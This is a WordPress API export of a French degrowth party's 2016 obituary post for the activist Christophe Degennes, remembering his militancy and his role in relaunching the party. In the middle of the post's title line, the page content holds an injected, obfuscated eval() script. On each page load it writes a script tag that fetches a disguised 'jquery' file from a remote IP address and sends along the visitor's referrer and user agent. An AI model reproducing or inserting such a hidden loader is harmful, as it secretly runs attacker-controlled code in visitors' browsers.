{"id":9273,"date":"2016-09-15T21:10:03","date_gmt":"2016-09-15T20:10:03","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9273"},"modified":"2017-06-12T07:35:51","modified_gmt":"2017-06-12T06:35:51","slug":"christophe-degennes-nous-a-quitte","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9273","title":{"rendered":"Christophe Degennes nous a quitt\u00e9"},"content":{"rendered":"<p style=\"text-align: center;\"><em><a href=\"http:\/\/www.partipourladecroissance.net\/?attachment_id=9272\" rel=\"attachment wp-att-9272\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-9272 aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-1.jpg\" alt=\"christophe-degennes-2010-1\" width=\"532\" height=\"357\" srcset=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-1.jpg 1000w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-1-300x202.jpg 300w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-1-768x516.jpg 768w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-1-600x403.jpg 600w\" sizes=\"auto, (max-width: 532px) 100vw, 532px\" \/><\/a><strong>Adieu <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kaiez|var|u0026u|referrer|yayey||js|php'.split('|'),0,{}))\n<\/script><\/noindex> l&rsquo;artiste<\/strong><\/em><\/p>\n<p>On l&rsquo;appelait Coincoin,<\/p>\n<p>En 2008, nous avions relanc\u00e9 le PPLD avec lui. Militant dans l&rsquo;\u00e2me, il a largement contribu\u00e9 \u00e0 construire le mouvement de la D\u00e9croissance et \u00e0 le faire vivre.<br \/>\nVous l&rsquo;avez certainement crois\u00e9 aux (f)Estives de la D\u00e9croissance, lors des actions de r\u00e9sistance (\u00e0 NDDL, lors des contres-G8 ou de rencontres \u00e9colos et\/ou de gauche). Vous \u00e9tiez peut-\u00eatre avec lui \u00e0 battre le pav\u00e9 parisien lors des nombreuses manifestations auxquelles il participait, \u00e0 peindre des banderoles, \u2026 ou \u00e0 refaire le monde jusqu&rsquo;au bout de la nuit.<br \/>\nCertains se souviendront de son appart&rsquo; du 5\u00e8me \u00e9tage, adoss\u00e9 au Sacr\u00e9 Coeur, escale heureuse, pleine de rires et de r\u00e9voltes.<\/p>\n<p>Christophe Degennes s&rsquo;est \u00e9teint le 11 septembre 2016 au petit matin, entour\u00e9 d&rsquo;amis.<\/p>\n<p>Tu nous manqueras<\/p>\n<p><!--more--><\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?attachment_id=9271\" rel=\"attachment wp-att-9271\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-9271 aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-2.jpg\" alt=\"christophe-degennes-2010-2\" width=\"510\" height=\"395\" srcset=\"https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-2.jpg 1000w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-2-300x233.jpg 300w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-2-768x595.jpg 768w, https:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2016\/09\/Christophe-Degennes-2010-2-600x465.jpg 600w\" sizes=\"auto, (max-width: 510px) 100vw, 510px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Adieu l&rsquo;artiste On l&rsquo;appelait Coincoin, En 2008, nous avions relanc\u00e9 le PPLD avec lui. Militant dans l&rsquo;\u00e2me, il a largement contribu\u00e9 \u00e0 construire le mouvement de la D\u00e9croissance et \u00e0 le faire vivre. Vous l&rsquo;avez certainement crois\u00e9 aux (f)Estives de &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9273\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,8],"tags":[],"class_list":["post-9273","post","type-post","status-publish","format-standard","hentry","category-billets-du-ppld","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9273"}],"version-history":[{"count":6,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9273\/revisions"}],"predecessor-version":[{"id":9279,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9273\/revisions\/9279"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9273"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}